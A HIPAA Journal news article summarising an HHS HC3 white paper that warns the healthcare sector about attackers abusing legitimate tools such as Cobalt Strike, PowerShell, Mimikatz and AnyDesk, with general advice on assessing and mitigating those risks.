The HIPAA Journal is the leading provider of news, updates, and independent advice for HIPAA compliance

HHS Warns HPH Sector About Abuse of Legitimate Software and Security Tools by Threat Actors

Posted By on Oct 10, 2022

It has become increasingly common for threat actors to use living-off-the-land techniques for conducting reconnaissance, privilege escalation, persistence, and moving laterally within networks undetected. The same software and security tools used by network administrators and red team professionals for legitimate purposes are abused and used to conduct attacks on victims’ infrastructure.

Threat actors leverage software tools that have already been installed to avoid having to download files via the Internet, malicious activities can be hidden within the logs along site legitimate use of these tools, and these tools are used to conduct malicious activities in the memory to evade security solutions. Traditional approaches to security such as blocking hashes of malicious files and malicious domains are ineffective against these tools, as they are already installed on the network.

Recently, the Health Sector Cybersecurity Coordination Center (HC3) issued a white paper warning the healthcare and public health sector (HPH) about these living-off-the-land techniques to raise awareness of the threat and explain the risks of using certain tools. The tools most commonly abused by malicious actors include the penetration testing and adversary simulation frameworks Cobalt Strike and Brute Ratel; Microsoft’s cross-platform automation tool, PowerShell; the credential dumping application, Mimikatz; the Windows troubleshooting application, Sysinternals; and the remote desktop application, Anydesk.

These and other tools have been extensively used by nation-state hackers and cybercriminals in attacks on a wide range of sectors, including healthcare, and mitigating against these tools can be a significant challenge. These tools all have legitimate uses and are often deployed on common systems, but the malicious use of these tools can be difficult to detect.

Get The FREE
HIPAA Compliance Checklist

Immediate Delivery of Checklist Link To Your Email Address

Please Enter Correct Email Address

Your Privacy Respected

HIPAA Journal Privacy Policy

Cobalt Strike, for instance, has been extensively abused by threat actors for the past 5 years. More than 8,000 attacks have been conducted that leveraged this comprehensive red team framework. The tool is commonly used by penetration testers to assess risks and vulnerabilities and simulate attacks, but the extensive capabilities of the framework are ripe for abuse. Cobalt Strike can be used as a highly customizable spear phishing tool, for discovering client-side applications, conducting exploitation/post-exploitation activities, data transfers, real-time communications, and for command and control of compromised systems. Brute Ratel is a newer and less well-known framework that has many of the same capabilities. Both of these tools are extensively used by ransomware gangs and nation-state threat actors, including in attacks on the healthcare sector.

PowerShell is a command shell and scripting language that is extensively used by IT teams for automation and configuration management, and defending against misuse can be a particular challenge. It is often not possible to block the use of the tool due to the value it provides, but if the tool is not commonly used, it should be disabled through group or security policies.

AnyDesk is a remote access solution that is used to access several operating systems for providing remote IT support. AnyDesk is also commonly used for file transfers and virtual private network services. Connections are encrypted to protect against data interception, but that also makes it harder to detect malicious use. AnyDesk has been extensively used by ransomware actors, including AvosLocker and Babuk, and BazarLoader uses AnyDesk to deploy ransomware payloads.

HC3 says the Department of Health and Human Services neither endorses nor condemns the use of these tools but recommends entities in the HPH sector should carefully evaluate these tools and assess the risks and rewards, and determine whether the value provided outweighs the risks.

In the white paper, HC3 provides a detailed explanation of each of these tools, their legitimate uses, how they are abused by threat actors, and steps that can be taken to prevent and detect malicious use.

Author: Steve Alder is the editor-in-chief of HIPAA Journal. Steve is responsible for editorial policy regarding the topics covered in The HIPAA Journal. He is a specialist on healthcare industry legal and regulatory affairs, and has 10 years of experience writing about HIPAA and other related legal topics. Steve has developed a deep understanding of regulatory issues surrounding the use of information technology in the healthcare industry and has written hundreds of articles on HIPAA-related topics. Steve shapes the editorial policy of The HIPAA Journal, ensuring its comprehensive coverage of critical topics. Steve Alder is considered an authority in the healthcare industry on HIPAA. The HIPAA Journal has evolved into the leading independent authority on HIPAA under Steve’s editorial leadership. Steve manages a team of writers and is responsible for the factual and legal accuracy of all content published on The HIPAA Journal. Steve holds a Bachelor’s of Science degree from the University of Liverpool. You can connect with Steve via LinkedIn or email via stevealder(at)hipaajournal.com

x

Is Your Organization HIPAA Compliant?

Find Out With Our Free HIPAA Compliance Checklist

Get Free Checklist